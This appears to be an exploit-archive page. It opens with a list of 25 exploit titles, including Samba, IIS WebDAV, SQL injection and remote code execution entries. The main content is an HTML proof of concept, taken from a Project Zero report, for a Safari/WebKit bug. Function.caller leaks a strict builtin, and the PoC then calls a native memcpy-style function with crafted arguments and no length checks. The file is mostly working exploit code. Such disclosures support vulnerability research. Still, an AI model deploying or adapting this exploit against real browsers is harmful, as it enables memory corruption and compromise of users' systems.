1f8c35c0c0
25 new exploits Samba < 3.6.2 (x86) - Denial of Serviec (PoC) Samba < 3.6.2 (x86) - Denial of Service (PoC) Microsoft Visual Studio 2015 update 3 - Denial of Service Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow Apple Safari - 'DateTimeFormat.format' Type Confusion Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode Apple Safari - Out-of-Bounds Read when Calling Bound Function QNAP QTS < 4.2.4 - Domain Privilege Escalation Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory Github Enterprise - Default Session Secret And Deserialization (Metasploit) B2B Alibaba Clone Script - SQL Injection B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection Just Another Video Script 1.4.3 - SQL Injection Adult Tube Video Script - SQL Injection Alibaba Clone Script - SQL Injection B2B Marketplace Script 2.0 - SQL Injection Php Real Estate Property Script - SQL Injection Courier Tracking Software 6.0 - SQL Injection Parcel Delivery Booking Script 1.0 - SQL Injection Delux Same Day Delivery Script 1.0 - SQL Injection Hotel Booking Script 1.0 - SQL Injection Tour Package Booking 1.0 - SQL Injection Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection CouponPHP CMS 3.1 - 'code' Parameter SQL Injection EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit) inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
55 lines
1.6 KiB
HTML
Executable file
55 lines
1.6 KiB
HTML
Executable file
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1032
|
|
|
|
If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. This is inconsistent with the behavior when executing non-builtin scripts in Safari, and the behavior in other browsers, where having a single strict function on the call stack forbids calls to Function.caller up to and including the first call to a strict function. This difference allows several sensitive native functions, such as arrayProtoPrivateFuncAppendMemcpy to be called directly, without the JavaScript wrappers that provide type and length checks.
|
|
|
|
A minimal example of this issue is as follows, and a full example is attached.
|
|
|
|
var q;
|
|
function g(){
|
|
q = g.caller;
|
|
return 7;
|
|
}
|
|
|
|
|
|
var a = [1, 2, 3];
|
|
a.length = 4;
|
|
Object.defineProperty(Array.prototype, "3", {get : g});
|
|
[4, 5, 6].concat(a);
|
|
q(0x77777777, 0x77777777, 0);
|
|
|
|
|
|
I strongly recommend this issue be fixed by changing the behaviour of Function.caller in strict mode, versus making changes to the natives, as it likely causes many similar problems
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<script>
|
|
|
|
var q;
|
|
function g(){
|
|
//print("in g");
|
|
//print(arguments.caller);
|
|
//print(g.caller);
|
|
q = g.caller;
|
|
//print(g.caller);
|
|
return 7;
|
|
|
|
}
|
|
|
|
var a = [1, 2, 3];
|
|
|
|
Object.defineProperty( Array.prototype, "1", { get : g} );
|
|
|
|
|
|
var a = [1, 2, 3];
|
|
a.length = 4;
|
|
Object.defineProperty(Array.prototype, "3", {get : g});
|
|
|
|
[4, 5, 6].concat(a);
|
|
alert(q);
|
|
q(0x7777, 0x7777, 0);
|
|
|
|
</script>
|
|
</body>
|
|
</html>
|